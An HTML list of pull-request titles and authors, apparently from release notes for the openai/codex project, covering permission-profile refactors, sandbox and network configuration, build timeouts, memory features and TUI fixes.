<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319542594" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19234" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19234/hovercard" href="https://github.com/openai/codex/pull/19234">#19234</a> Refactor log DB into LogWriter interface <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rasmusrygaard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rasmusrygaard">@rasmusrygaard</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326109026" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19461" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19461/hovercard" href="https://github.com/openai/codex/pull/19461">#19461</a> fix: Bedrock GPT-5.4 reasoning levels <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/celia-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/celia-oai">@celia-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325700629" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19449" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19449/hovercard" href="https://github.com/openai/codex/pull/19449">#19449</a> permissions: remove legacy read-only access modes <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326377980" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19472" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19472/hovercard" href="https://github.com/openai/codex/pull/19472">#19472</a> ci: pin codex-action v1.7 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326322690" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19468" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19468/hovercard" href="https://github.com/openai/codex/pull/19468">#19468</a> Fix Bazel cargo_bin runfiles paths <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fjord-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fjord-oai">@fjord-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324636369" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19410" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19410/hovercard" href="https://github.com/openai/codex/pull/19410">#19410</a> Remove js_repl feature <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fjord-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fjord-oai">@fjord-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273300761" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18073" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18073/hovercard" href="https://github.com/openai/codex/pull/18073">#18073</a> Add goal persistence foundation (1 / 5) <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273301147" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18074" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18074/hovercard" href="https://github.com/openai/codex/pull/18074">#18074</a> Add goal app-server API (2 / 5) <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273301542" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18075" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18075/hovercard" href="https://github.com/openai/codex/pull/18075">#18075</a> Add goal model tools (3 / 5) <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273302057" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18076" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18076/hovercard" href="https://github.com/openai/codex/pull/18076">#18076</a> Add goal core runtime (4 / 5) <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273302413" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18077" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18077/hovercard" href="https://github.com/openai/codex/pull/18077">#18077</a> Add goal TUI UX (5 / 5) <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325837896" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19454" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19454/hovercard" href="https://github.com/openai/codex/pull/19454">#19454</a> Split approval matrix test groups <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylan-hurd-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylan-hurd-oai">@dylan-hurd-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327361493" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19514" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19514/hovercard" href="https://github.com/openai/codex/pull/19514">#19514</a> Fix codex-rs README grammar <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325992898" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19459" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19459/hovercard" href="https://github.com/openai/codex/pull/19459">#19459</a> Enable unavailable dummy tools by default <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzeng-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzeng-openai">@mzeng-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327447623" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19524" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19524/hovercard" href="https://github.com/openai/codex/pull/19524">#19524</a> [codex] Prune unused codex-mcp API and duplicate helpers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aibrahim-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aibrahim-oai">@aibrahim-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327472856" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19526" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19526/hovercard" href="https://github.com/openai/codex/pull/19526">#19526</a> [codex] Order codex-mcp items by visibility <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aibrahim-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aibrahim-oai">@aibrahim-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328715161" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19578" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19578/hovercard" href="https://github.com/openai/codex/pull/19578">#19578</a> fix: increase Bazel timeout to 45 minutes <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320754809" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19287" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19287/hovercard" href="https://github.com/openai/codex/pull/19287">#19287</a> Restore persisted model provider on thread resume <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329141624" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19593" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19593/hovercard" href="https://github.com/openai/codex/pull/19593">#19593</a> test: isolate remote thread store regression from plugin warmups <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327330725" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19511" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19511/hovercard" href="https://github.com/openai/codex/pull/19511">#19511</a> Keep slash command popup columns stable while scrolling <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329152369" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19595" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19595/hovercard" href="https://github.com/openai/codex/pull/19595">#19595</a> [codex] Bypass managed network for escalated exec <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329426355" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19604" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19604/hovercard" href="https://github.com/openai/codex/pull/19604">#19604</a> test: stabilize app-server path assertions on Windows <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329482943" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19609" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19609/hovercard" href="https://github.com/openai/codex/pull/19609">#19609</a> fix: restore 30-minute timeout for Bazel builds <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324075005" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19389" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19389/hovercard" href="https://github.com/openai/codex/pull/19389">#19389</a> Guard npm update readiness <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shijie-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shijie-oai">@shijie-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291546363" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18575" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18575/hovercard" href="https://github.com/openai/codex/pull/18575">#18575</a> fix(tui): reflow scrollback on terminal resize <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcoury-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcoury-oai">@fcoury-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329485410" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19610" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19610/hovercard" href="https://github.com/openai/codex/pull/19610">#19610</a> Support end_turn in response.completed <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andmis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andmis">@andmis</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330133968" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19640" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19640/hovercard" href="https://github.com/openai/codex/pull/19640">#19640</a> [codex] remove responses command <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tibo-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tibo-openai">@tibo-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331178875" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19683" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19683/hovercard" href="https://github.com/openai/codex/pull/19683">#19683</a> test: harden app-server integration tests <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305745220" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18904" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18904/hovercard" href="https://github.com/openai/codex/pull/18904">#18904</a> feat: load AgentIdentity from JWT login/env <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efrazer-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efrazer-oai">@efrazer-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329447069" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19606" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19606/hovercard" href="https://github.com/openai/codex/pull/19606">#19606</a> permissions: make runtime config profile-backed <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324130687" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19392" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19392/hovercard" href="https://github.com/openai/codex/pull/19392">#19392</a> permissions: derive compatibility policies from profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326667709" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19484" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19484/hovercard" href="https://github.com/openai/codex/pull/19484">#19484</a> Lift app-server JSON-RPC error handling to request boundary <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326740507" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19487" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19487/hovercard" href="https://github.com/openai/codex/pull/19487">#19487</a> [codex] Move config loading into codex-config <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324130800" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19393" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19393/hovercard" href="https://github.com/openai/codex/pull/19393">#19393</a> permissions: migrate approval and sandbox consumers to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332185741" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19726" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19726/hovercard" href="https://github.com/openai/codex/pull/19726">#19726</a> Fix codex-core config test type paths <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332186405" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19727" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19727/hovercard" href="https://github.com/openai/codex/pull/19727">#19727</a> test: increase core-all-test shard count to 16 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332166288" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19725" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19725/hovercard" href="https://github.com/openai/codex/pull/19725">#19725</a> Split MCP connection modules <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aibrahim-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aibrahim-oai">@aibrahim-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329432468" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19605" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19605/hovercard" href="https://github.com/openai/codex/pull/19605">#19605</a> Delete unused ResponseItem::Message.end_turn <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andmis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andmis">@andmis</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324130921" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19394" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19394/hovercard" href="https://github.com/openai/codex/pull/19394">#19394</a> permissions: remove core legacy policy round trips <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332404644" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19733" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19733/hovercard" href="https://github.com/openai/codex/pull/19733">#19733</a> Allow agents.max_threads to work with multi_agent_v2 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andmis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andmis">@andmis</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324131276" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19395" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19395/hovercard" href="https://github.com/openai/codex/pull/19395">#19395</a> permissions: finish profile-backed app surfaces <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332488153" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19739" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19739/hovercard" href="https://github.com/openai/codex/pull/19739">#19739</a> inline hostname resolution for remote sandbox config <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinav-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinav-oai">@abhinav-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332428502" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19734" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19734/hovercard" href="https://github.com/openai/codex/pull/19734">#19734</a> permissions: centralize legacy sandbox projection <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312551868" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19058" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19058/hovercard" href="https://github.com/openai/codex/pull/19058">#19058</a> Add /auto-review-denials retry approval flow <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/won-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/won-openai">@won-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332428542" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19735" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19735/hovercard" href="https://github.com/openai/codex/pull/19735">#19735</a> permissions: store only constrained permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332428595" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19736" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19736/hovercard" href="https://github.com/openai/codex/pull/19736">#19736</a> permissions: constrain requirements as profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332428717" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19737" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19737/hovercard" href="https://github.com/openai/codex/pull/19737">#19737</a> permissions: derive legacy exec policies at boundaries <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333454760" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19779" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19779/hovercard" href="https://github.com/openai/codex/pull/19779">#19779</a> Add Codex issue digest skill <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334317712" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19792" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19792/hovercard" href="https://github.com/openai/codex/pull/19792">#19792</a> multi_agent_v2: move thread cap into feature config <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309186034" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18982" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18982/hovercard" href="https://github.com/openai/codex/pull/18982">#18982</a> feat: use git-backed workspace diffs for memory consolidation <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335787303" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19809" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19809/hovercard" href="https://github.com/openai/codex/pull/19809">#19809</a> Allow Phase 2 memory claims after retry exhaustion <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335909611" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19812" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19812/hovercard" href="https://github.com/openai/codex/pull/19812">#19812</a> Avoid rewriting Phase 2 selection on clean workspace <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336035104" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19813" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19813/hovercard" href="https://github.com/openai/codex/pull/19813">#19813</a> nit: one more fix <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336176625" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19818" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19818/hovercard" href="https://github.com/openai/codex/pull/19818">#19818</a> chore: split memories part 1 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327309902" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19510" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19510/hovercard" href="https://github.com/openai/codex/pull/19510">#19510</a> Hide rewind preview when no user message exists <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329666770" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19618" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19618/hovercard" href="https://github.com/openai/codex/pull/19618">#19618</a> Persist shell mode commands in prompt history <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331916000" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19709" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19709/hovercard" href="https://github.com/openai/codex/pull/19709">#19709</a> Render delegated patch approval details <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
